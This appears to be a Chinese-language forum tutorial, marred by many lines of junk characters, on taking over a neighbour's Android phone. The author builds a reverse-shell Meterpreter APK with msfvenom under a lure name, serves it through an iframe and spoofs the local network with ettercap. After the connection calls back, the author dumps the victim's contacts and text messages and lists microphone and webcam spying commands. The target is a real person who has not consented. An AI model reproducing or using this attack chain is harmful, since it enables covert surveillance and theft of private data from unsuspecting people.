|
) B# L+ l* U3 {" M 五、msf+ettercap入侵邻居安卓手机 # X% G2 x- `* R6 {
( t! K! Z! `' G6 l$ S1 N0 @6 q1 `1 @" {& x, B! O5 C+ s
首先启动msf
' ]8 d, b# d2 \! G S; z
+ G( m1 V$ X" E0 m' Y- K, s) s6 |2 V- h2 U
先用kali生成一个安卓木马,如下命令: . ?- d9 k8 m1 G! ]( d6 U
5 O- a8 D3 L9 q! Z/ k h4 G
; z# P r) j U% ]- F+ P Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ' w) p/ d1 u( d' L& g
4 s& r" T+ \8 i V* G) D. a# M1 P1 R4 ]) {! U1 N; x, y
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ) N% z5 n) U, o
7 }$ l2 A/ _; ?$ a* _( x
0 E4 u4 m. C4 k3 ~ F; j; ^" E/ M6 v 然后进入msf # W; X$ w: y# N8 a+ H4 y0 c
- q* s7 ?; ^; L( Z3 S( @3 J
/ Y& r. e, k; _( @; t4 d# e use exploit/multi/handler 5 _* K/ S& e d* o- B1 R' E& P
0 W, b( g3 V6 W) M. h# h# g' s$ a" x5 p, j) L7 [' b! Z2 \( Y. L2 A
set payload android/meterpreter/reverse_tcp 2 r' Z5 h$ q. C2 `- N/ m
0 o9 O5 b4 f3 F0 i8 w
. K1 s0 T, m/ c1 f set LHOST 192.168.0.109 //ip为kaili的ip 0 b, d1 Q# Y) U4 T. V1 h
3 `* B# m! F; o( A# T; W7 c
" `6 v4 n N8 ^, i' P, r. u set LPORT 44444 //端口一定要与前面生成的木马的端口一致
1 t* k g c5 L) i4 r$ S/ j( t/ u; b
* m/ t* e# e4 b8 F, B' U
; d: G6 H ^! m Exploit - \" p5 C3 h% z2 p( h# y0 _
: O- ^) X6 U0 V
9 ]2 k+ D [2 C. ~/ H1 o7 }5 g$ Z7 |
% e* Y! ?% C' e
1 }! J3 U0 i u8 `
4 p$ Z( ?; L. S; Q9 v 下面我们开启ettercap -G * l0 T" a5 U/ U6 {
# ?+ I q$ a* ?# D0 G' v6 r
/ B) f# s" {" `; c5 h# B" j 我物理IP为
1 ?" n) G/ O2 }; _3 P; L0 Z
. \4 I8 g+ Q( Q& X5 s
" }5 s& g4 ], S9 ^
; n4 h( O) W: V. u " l6 r# S$ o% g8 R; L; w/ N
2 H1 D: p# f+ F4 d! i# t( L% L
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 9 F- ^: b+ B$ O- U8 N2 J5 ]
4 ], f$ r# [# k+ ^ K* M
+ a2 h, O% a; r; |, M 下面我们来设置一下
* x/ K4 t$ Q3 R1 j. n" Z0 { ; T5 i3 B0 |' U! f' h
& g1 r3 {, ?; f3 G: F9 w D
4 t" ]) m6 _# @
/ h8 W4 F/ D4 x$ M: v4 d% Q9 X/ |8 y% u3 p* W/ ^4 b! {2 q5 j
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 8 J( F- V* |1 Z3 j' `( g
2 \1 ?/ D1 m* ^: u6 B# D
$ h$ V( r; h" C6 a- V
1 M* s2 g# E5 x2 g
7 D1 A! I$ y3 I- E1 C: P4 I8 g' @; G7 _ A2 o1 i- K# C' {/ J4 `
2 e, |9 v( Z$ n2 Z- F- r( A
/ b: x. f3 v9 L9 u' B8 E
8 [: {5 c1 y( {4 f# g ) }0 y, ^" U. z
3 Z/ p; J. D* H8 s
# Z, c m! C1 N+ e) v : p/ v# ?( P' w( A" C. X# _
- ]) m0 E7 J3 x+ ?% M
8 q; {! L8 A9 @$ N$ u : L4 }7 I' I9 \
+ _& W5 z& `! _
9 v% Q* ?+ h. }' F2 j% ?6 l
$ K- y" _& f0 M0 K8 Y 8 `% P; M8 z& x( @( h: U
$ \, J% ?( B# H3 {0 K8 c, E ' M$ J3 h% M' E4 b
. P: e0 L, z0 n- \( A K. y! y
1 O; f% B/ z; p* e & m. L. C' q! K% g. |/ l" H
8 a) M/ } o! S4 S/ u+ M
) Z* [+ |7 x- `7 a
2 I: P7 C% | D% K
# S8 w9 H* ~1 m6 m3 R
0 K: Q5 c: q; c1 @4 X. g9 c) } 0 b8 v9 \5 c u) c, w/ Y* T+ }* N- q, q! R
9 p; Z' Y8 E7 T$ W
, l- ^' K! h- V. I* D) K- s3 G2 l
. L5 `& T6 z1 [6 `& _" x
1 R5 j: G2 h* E
3 }% V* T9 k# ~# } " A. ?! Z3 e) S5 U; H9 D5 @
2 g* Q7 a# ~8 O" j3 g
* l$ j! K8 P1 G0 C; X, e! C
+ P5 u P: e& m* L
5 i% k/ o+ ~7 S/ l% K
6 L3 g# G( Q3 N" h6 r" y 下面我们开始攻击
! D% \0 Z9 Z8 u9 V( M3 N
+ @" @- ^2 H+ P7 L8 q& P' ~+ v) Q! t' l
T% I/ P5 m k" q! n- X6 v6 | 2 i2 X6 a! E9 H m
% p o4 k h) k& R0 }. ~
7 T7 s5 M* o+ z8 {& [ |0 I6 b
2 E3 Q$ @# d h' |
# I7 X3 ^! ^+ |8 E3 \
- g G5 {' W. x3 f( Z( f `- J
" z" y8 y) D+ C" P: g
) D3 W; n* l$ O
2 }0 H" g* r! V: D- J 1 U* S1 f% |, t6 i
1 }* m5 ^' O1 J4 K 5 z& ^" |" g0 p* i5 c o& P
. r4 |5 a) o& _( X( E1 E( z% G, {. _' V5 Q3 x, D
大概过了5分钟多,发现反弹成功了 ( ^/ X ]! z0 H6 G
3 |4 D- P9 m+ A2 x8 `5 [4 o% C( H1 f" U+ @7 T7 \; K
8 ?, y' r. [0 }5 o- `5 I, [ 9 I: Y N# e; H- ?! D0 j. H
; S2 k+ ^) B: s% N
" s# P: _: G4 W J, m2 D
) H# _" j! W6 X8 ?+ o( E! _" |/ B3 r; d
( |; I9 m' t9 w( {3 g6 t
9 Q9 d* \+ B) x
* ~3 ^( g0 b. S5 Y: i) y/ ? 0 X. _+ V! ?& ?! ?- `0 ?* F$ B
2 F- R7 |! w3 h+ A) a
1 H& z, I: X8 \5 B9 W 9 q n% l7 W& V0 ~- A5 V
6 N( v) l/ |, L, s* t6 E# \: Q1 u2 [$ ~5 A$ t$ @
) G) R9 \' R& u) ]' E( }. r! d
0 n' r6 O/ n9 G
, ^$ v( v3 V) F $ |, x+ ~6 t' x' h/ Z
- p5 [( `3 i; W
, Q3 |# r7 I* I% @# x( b
执行命令
N8 c" j2 h/ Z/ \" `& P 5 B' l j. Q+ [0 O+ z
- K' L6 g+ \* U7 J S * [* F2 b9 v) [. X+ M- ~+ f
, v. J6 t4 @0 _( |
" m" S& b4 c" p5 N' m dump_contacts --》这个是导出电话
3 E4 {6 `/ {; d# x3 j$ j3 f$ D2 o3 M1 I , [5 H' \( e7 M% k1 A
4 R6 D% Z/ F. r3 T, a2 d dump_sms --》这个是导出信息 % L+ z, X T$ s Z, m# J- O
' L% H" B" h3 Q3 G9 s' M
4 K, d% u2 V" ^ record_mic Record audio from the default microphone for X seconds / }0 A3 M# e) t+ Q9 R
6 V" V9 S2 S' e. O
$ Z0 @/ J* E8 ^/ ~+ V% x0 Z6 r, ]) m
webcam_chat Start a video chat
' d' S! [, c& e6 V2 r+ U ) T! l/ k" {3 [/ d- O( b0 P8 N' q
4 S7 w* |: o" Q webcam_list List webcams % z4 K! a: D2 f( p3 {8 A
& F( Z3 `& h# i" s( {$ w1 |* t! P, T2 T7 {$ P. H# o
webcam_snap Take a snapshot from the specified webcam : V1 ~1 A! w$ o8 d
/ a6 v/ u; T+ N; j7 O# y
4 R( ?8 Z+ S8 O5 p+ M0 m" z7 N webcam_stream   lay a video stream from the specified webcam
. |& `! w1 K5 j+ ?6 G" W) L ]+ A - W$ y& y, Q! E6 X1 t
' O2 U! Z3 ^; j7 C7 D/ U: V* z
M# Y& g' o3 K
% _. f- ^3 F/ @9 _# x
# W& `8 `2 G5 h. w, _% y- ?: U* @2 ~ * f8 Z2 G% p& ?- U* o% W
2 X: u, M7 E* T
6 c' v( P8 y1 l7 o" u( Z% h7 Y
我们打开看一下电话薄,
/ x- m! |# h# E+ c
; s* M& N! }4 p$ V; X$ @, q
5 g; V. V5 ^9 {, I5 f9 C
- X j' h* g- @0 T& @, D5 \
! J8 p; V' I4 w. p4 y% Q8 u/ y6 x u) z5 H, @
( Y r1 X8 E# r" D% Y- B) G 2 |* g' o* \& V d- N( c' L
# Z2 a; M( T7 A4 ]
5 \0 ^- m, v: ~+ Z! f& V- r1 Q
' Z6 }& e( K7 q5 q' T
; o# V) E- f: f- }; u. u& x& w
; t, @# _- Y- N5 J! C / Q" g! X/ h0 i4 Z8 Y$ x4 w' h8 \
, v. j# ^: m. ^9 O' |
# Z& D8 q2 ~+ W* v+ N
* E9 `5 ]$ r2 Q, S8 G5 q8 B! S s$ ]1 k" s2 E, _" Z% H
2 u+ u0 P) k9 j* _0 s, C
: ?& d3 P5 a) ^) L% Q% {5 |- K3 o
我们同时欺骗成DroidJack木马,使用方法如图: 6 w) x) G6 t7 f3 g, n
$ p1 O. q0 P L# M* b: ]& Y- v$ T
7 a" z; }6 t& N 7 O( v. j$ S% A4 h; b( i
8 h$ f( l# \( p- b; Q- y H
/ Z6 a6 Q2 |' o- }+ q- d' D " c" v! @5 G1 U' `8 g
; i9 M$ C& a% |9 Y& r8 \8 o* M! b; Q2 Q4 R& g
6 T0 K2 W# ?5 B8 E+ E0 u
' [1 J" [/ \0 u S L
8 B+ n8 r6 C' B% ^+ U+ D
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 0 i, k8 y5 p& ^4 Q5 R; [/ @
; c+ |7 I4 G7 W. g5 w; T
5 t9 V5 o+ y) `
- X2 Z/ {4 S' s, H: j& H- S( r $ b, ]9 A4 ~% y' |
- v$ g. [ G" t6 |7 f" ^: ~' {
1 L; ?! d% t3 @' k9 Z+ Z! N . K* U, `) A3 s% C D
1 p) u: D X$ Q& H& k4 I1 ?
" t F& D5 O0 S
! M& r& k, M; C; | Z, g
$ p7 `% X0 f9 d; M 
8 j7 z4 g' l$ C9 x
* m9 j5 e; ?* L( Q/ N! g6 w/ I' S2 v1 K7 X$ `9 s
* n4 c0 D& Z+ l) b Q. V |